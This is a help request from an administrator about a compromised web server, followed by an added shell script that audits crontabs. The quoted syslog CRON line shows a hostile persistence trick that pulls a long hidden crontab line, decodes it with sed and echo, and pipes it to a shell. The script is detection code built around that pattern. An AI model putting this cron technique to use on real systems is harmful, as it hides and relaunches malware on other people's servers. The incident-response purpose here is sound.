Re: a compromised machine
Thanks for your help. I didn't make much progress though. However, after
killing all these processes, a new one was run
www-data 6059 0.0 0.1 1616 600 ? S 17:31 0:00
/tmp/dlciiqlno x
That means that the process was started at 17:31 today. So I checked the
logs (all virtual servers) and there was nothing under 17:31 except for
193.77.107.1 - - [24/Jul/2005:17:31:39 +0200] "GET / HTTP/1.0" 200 3444
"-" "-"
It didn't make much sense to me, so I also checked syslog and it said
Jul 24 17:31:01 soncek /USR/SBIN/CRON[6050]: (www-data) CMD (/bin/echo
`crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|s$
Jul 24 17:31:01 soncek crontab[6054]: (www-data) LIST (www-data)
I killed the process and webserver and at 19:31 the process started
again with the same lines in syslog.
What now?
Thanks
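
Added example, not part of the original message: a shell check for the pattern visible in the CRON syslog line above, where the job reads the www-data crontab back with `crontab -l` and selects lines of at least 666 characters. The function names and the sample crontab are constructed for illustration; the logged command is truncated in syslog, so nothing here assumes what follows the final pipe.

```shell
#!/bin/sh
# Added example. Flags the two things the logged CRON CMD relies on:
#   1. crontab lines of at least 666 characters (the grep '.\{666\}' filter)
#   2. active entries that read the crontab back with "crontab -l"
# On a live host, as root:  crontab -u www-data -l | audit_crontab

audit_crontab() {
    # $1: minimum length to report (defaults to the 666 from the log line)
    awk -v min="${1:-666}" '
        length($0) >= min {
            printf "LONG line %d (%d chars), starts: %.40s\n", NR, length($0), $0
        }
        # Non-comment entry that lists its own crontab
        $0 !~ /^[ \t]*#/ && /crontab[ \t]+-l/ {
            printf "SELFREF line %d: %.100s\n", NR, $0
        }
    '
}

sample_crontab() {
    # Constructed sample, not taken from the compromised host
    printf '%s\n' '# m h dom mon dow command'
    printf '%s\n' '17 3 * * * /usr/local/bin/rotate-cache'
    printf '#%0699d\n' 0    # 700-character comment line standing in for a stored payload
    printf '%s\n' '31 * * * * /bin/echo `crontab -l|grep PLACEHOLDER`|PLACEHOLDER'
}

# Demonstration on the constructed sample
sample_crontab | audit_crontab
```

Run it against every account's crontab, not only www-data, and keep a copy of the flagged file as evidence before removing the entry.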